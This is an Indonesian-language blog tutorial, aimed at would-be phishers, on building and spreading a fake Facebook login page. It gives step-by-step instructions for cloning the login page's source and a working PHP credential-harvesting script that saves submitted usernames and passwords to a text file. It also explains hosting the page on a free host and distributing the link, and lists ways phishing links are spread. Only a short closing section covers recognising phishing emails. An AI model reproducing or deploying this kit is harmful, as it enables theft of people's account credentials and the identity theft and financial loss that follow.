Bagaimana Membuat dan Cara Kerja Phising ?

 



Buat para phiser nih yang ingin membuat web phising, di sini saya akan berbagi tutorial cara membuat web phising. Web fake login, website yang menyerupai website halaman login aslinya.

Apa itu Web Phising?
Tentunya kalian sudah tahu kan apa itu web phising? seperti yang sudah saya jelaskan di atas, web phising adalah sebuah halaman login palsu yang menyerupai halaman login web aslinya.

Misal, Anda ingin membuat web phising facebook, tentunya Anda harus membuat website yang semirip mungkin dengan laman login facebook dong. Ini bertujuan agar si calon korban tidak curiga bahwa laman web tersebut adalah halaman login palsu.

Bagaimana Web Phising itu Bekerja?
Ada dua jenis cara kerja web phising, tentunya itu tergantung dari script phising yang Anda gunakan:
Send Mail
True Login

Script Phising send mail: Jika ada seseorang yang login ke halaman login palsu yang Anda buat, secara otomatis Anda akan menerima pemberitahuan (send mail) dari web phising yang Anda buat tadi yang berisi:
User / Akun email
Password
dan info penting lainnya

Script Phising True Login: berbeda dengan metode phising send mail, jenis script phising ini bisa dibilang sudah ketinggalan jaman. Anda harus mengakses cpanel web Anda untuk membuka hasil phising secara manual, tidak ada pemberitahuan apakah sudah mendapatkan korban atau belum.

Baca juga : Apa Itu Web Phising, Cara Kerja dan Menghindarinya

Pada kesempatan kali ini saya hanya membahas menggenai web phising.

Cara Membuat Web Phising
Misalkan kamu mau membuat web phising login facebook.com.

  1. Buka halaman login facebook.com seperti gambar diatas
  2. Klik kanan lalu pilih view source atau ctrl + u
  3. Copy semua script yang ada dengan cara tekan ctrl + a
  4. Pastekan di notepad
  5. Setelah itu cari kode "action=" (ctrl + f untuk mencari) lalu hapus alamat facebook ganti dengan nama "login.php" lalu simpan dengan nama index.html
  6. Copy kode dibawah ini lalu simpan dengan login.php
    <?php
header(“Location: http://www.facebook.com“);
$handle = fopen(“password.txt“, “a”);

foreach($_GET as $variable => $value)

{

fwrite($handle, $variable);
fwrite($handle, “=”);

fwrite($handle, $value);
fwrite($handle, “\r\n”);

}

fwrite($handle, “\r\n”);
fclose($handle);
exit;

?>
  7. Buka kembali notepad kosong dan simpan dengan nama password.txt
Buatlah Web Hosting
Buka website 000webhost untuk mendapatkan hosting dan domain gratis atau mungkin sediakan hosting yang sudah kalian beli

  1. Buka laman web 000webhost dan klik Free Sign Up.
  2. Masukan alamat email Anda (@gmail / @yahoo) terserah, yang penting email aktif dan Klik Sing Up.
  3. Cek kotak masuk Email kalian dan konfirmasi pendaftaran akun 000webhost “Click here to verifly your email”.
  4. Lewati semua laman panduan, atau jika Anda inginkan baca juga tidak apa-apa. 
  5. Isi nama website dan password. 
  6. Scroll kebawah dan cari menu Upload Own Webite 
  7. Disinilah script phising yang kalian buat tadi akan di upload. 
  8. Klik Icon Upload Own Website dan unggah script phising kalian. 
  9. Buka File Manager dan Extrat script phising yang kalian upload tadi. 
  10. Copy link website phising dan sebarkan. 
Disni saya anggap kamu sudah mengerti bagaimana cara upload file di web hosting. Jadi, saya tidak menjelaskannya disini.

Cara Mendapatkan Korban Phising
Mau tau bagaimana seorang hacker menyebarkan web phising mereka untuk mendapatkan calon korban?
Dalam artikel ini kita akan membahas tentang cara hacker menyebarkan web phising.

Phishing adalah kejahatan dunia maya di mana target atau sasaran dihubungi melalui email, telepon atau pesan teks oleh seseorang yang menyamar sebagai lembaga yang sah untuk memikat individu agar memberikan data sensitif seperti informasi yang dapat diidentifikasi secara pribadi, rincian kartu kredit dan perbankan, serta kata sandi.

Informasi tersebut kemudian digunakan untuk mengakses akun-akun penting dan dapat mengakibatkan pencurian identitas dan kerugian finansial.

Cara Menyebarkan Phising
Berikut ini adalah beberapa cara yang biasa di lakukan oleh seorang hacker dalam menyebarkan link phising:
  1. Malware
    Penipuan phishing yang melibatkan perangkat lunak jahat harus dijalankan di komputer pengguna. Malware biasanya dilampirkan ke email yang dikirim ke pengguna oleh phisher. Setelah Anda mengklik tautan, malware akan mulai berfungsi. Terkadang, malware juga dapat dilampirkan ke file yang dapat diunduh.
  2. Ransomware
    Ransomware menolak akses ke perangkat atau file hingga tebusan dibayarkan. Ransomware for PC’s adalah malware yang diinstal pada workstation pengguna menggunakan serangan rekayasa sosial di mana pengguna diperdaya dalam mengklik tautan, membuka lampiran, atau mengklik malvertising.
  3. Phishing melalui Mesin Pencari
    Beberapa penipuan phishing melibatkan mesin pencari di mana pengguna diarahkan ke situs produk yang mungkin menawarkan produk atau layanan berbiaya rendah. Ketika pengguna mencoba membeli produk dengan memasukkan rincian kartu kredit, itu dikumpulkan oleh situs phishing. Ada banyak situs web bank palsu yang menawarkan kartu kredit atau pinjaman kepada pengguna dengan harga rendah tetapi mereka sebenarnya adalah situs phishing.
  4. Injeksi Konten
    Injeksi konten adalah teknik di mana phisher mengubah bagian dari konten pada halaman situs web yang andal. Ini dilakukan untuk menyesatkan pengguna untuk pergi ke halaman di luar situs web yang sah di mana pengguna kemudian diminta untuk memasukkan informasi pribadi.
  5. Periklanan
    Malvertising adalah iklan berbahaya yang berisi skrip aktif yang dirancang untuk mengunduh malware atau memaksa konten yang tidak diinginkan ke komputer Anda. Eksploitasi dalam Adobe PDF dan Flash adalah metode yang paling umum digunakan dalam iklan.
  6. Sesion Hijacking
    Phisher mengeksploitasi mekanisme kontrol sesi web untuk mencuri informasi dari pengguna. Dalam prosedur hacking sesi sederhana yang dikenal sebagai sesi sniffing, phisher dapat menggunakan sniffer untuk mencegat informasi yang relevan sehingga ia dapat mengakses server Web secara ilegal.
  7. Trojan
    Trojan horse adalah jenis malware yang dirancang untuk menyesatkan pengguna dengan tindakan yang terlihat sah, tetapi sebenarnya memungkinkan akses tidak sah ke akun pengguna untuk mengumpulkan kredensial melalui mesin lokal. Informasi yang diperoleh kemudian ditransmisikan ke penjahat cyber.
  8. Keyloggers
    Keyloggers merujuk pada malware yang digunakan untuk mengidentifikasi input dari keyboard. Informasi tersebut dikirim ke peretas yang akan menguraikan kata sandi dan jenis informasi lainnya. Untuk mencegah penebang kunci mengakses informasi pribadi, situs web yang aman menyediakan opsi untuk menggunakan klik mouse untuk membuat entri melalui keyboard virtual.
  9. Link Phising
    Link phising adalah teknik di mana phisher mengirim tautan ke situs web palsu. Ketika pengguna mengklik link halaman fack login, itu membuka situs web phisher alih-alih situs web yang disebutkan dalam tautan. Mengarahkan mouse ke tautan untuk melihat alamat yang sebenarnya menghentikan pengguna dari jatuh cinta pada manipulasi tautan.
  10. Telepon Phising
    Phishing telepon, phisher melakukan panggilan telepon ke pengguna dan meminta pengguna untuk memanggil nomor. Tujuannya adalah untuk mendapatkan informasi pribadi dari rekening bank melalui telepon. Telepon phishing sebagian besar dilakukan dengan ID penelepon palsu.
  11. Situs Web Kartu Kredit Palsu
    Situs web kartu kredit palsu dapat dilakukan dengan sangat baik. Bahkan jika Anda mengunjungi situs web perusahaan kartu kredit Anda secara teratur, terlalu mudah untuk dibodohi. Phisher menggunakan banyak teknik canggih untuk membuat situs web palsu yang tampak mirip dengan rekan-rekan mereka yang sah. Dalam ketergesaan untuk mencari tahu apa yang salah, mudah saja jatuh ke dalam perangkap phisher.
  12. Email Bank Spoof
    Cara paling umum yang dilakukan phisher untuk menggulirkan serangan phishing bank adalah dengan mengirimkan ribuan email spoof. Email-email ini dibuat dengan hati-hati agar terlihat hampir identik dengan jenis-jenis korespondensi yang dikirim oleh bank-bank yang sebenarnya. Phisher yang terampil dapat mereplikasi logo, tata letak, dan nada umum email semacam itu ke tingkat yang tidak biasa. Mereka mengandalkan fakta bahwa kebanyakan orang cukup sibuk; sekilas, email spoof ini tampaknya sah. Akibatnya, penerima lebih cenderung menganggap serius apa yang tertulis di dalamnya.
Apa itu Phishing Email?
Email phishing mengacu pada tindakan membuat dan mengirim email palsu atau palsu dengan tujuan mendapatkan informasi keuangan dan pribadi yang sensitif. Di bawah skema semacam itu, email dirancang agar terlihat persis seperti yang dikirim oleh perusahaan yang sah. Serangan phishing yang canggih menggunakan alamat email orang yang terdaftar untuk menggunakan layanan tertentu. Ketika orang-orang menerima email yang seharusnya dari perusahaan-perusahaan itu, mereka lebih cenderung mempercayai mereka. Email palsu sering berisi link yang mengarah ke situs web palsu, di mana berbagai metode digunakan untuk meminta dan mengumpulkan informasi keuangan dan pribadi seseorang. Formulir terkadang juga terdapat di dalam email itu sendiri.

Mengapa Email Phishing Bekerja?
Mengingat berapa lama phishing email telah digunakan, mungkin aneh bahwa ini terus bekerja. Bukan karena orang bodoh; itu karena email ini dilakukan dengan sangat baik. Phisher tahu persis bagaimana merancang email palsu agar terlihat seperti rekan mereka yang sah. Dengan menggunakan bahasa yang mendesak, phisher secara dramatis meningkatkan peluang keberhasilan mereka. Orang yang sibuk memindai email semacam itu, mempercayai mereka, dan mengklik tautan mereka karena mereka terlihat hampir persis seperti aslinya. Satu klik yang salah dapat menyebabkan dunia terluka.

Tanda-tanda Phishing Email
Ada banyak tanda email phishing. Hal pertama yang harus Anda perhatikan adalah salam. Apakah itu menggunakan nama asli Anda, atau apakah itu memiliki salam generik? Perhatikan baik-baik header email itu. Apa alamat email pengirim? Alamat-alamat ini biasanya dirancang dengan cermat agar terlihat asli. Namun, dengan mencermati mereka, Anda biasanya dapat melihat ketidakkonsistenan dan hal-hal yang tidak masuk akal. Jika memungkinkan, bandingkan alamat email pengirim dengan pesan sebelumnya dari perusahaan yang sama. Jika ini email phising, Anda akan melihat hal-hal yang tidak bertambah.

Next
Prev Post
Previous
Next Post
No comments:
Write komentar

Get updates in your email box

Complete the form below, and we'll send you our recent update.

Deliver via FeedBurner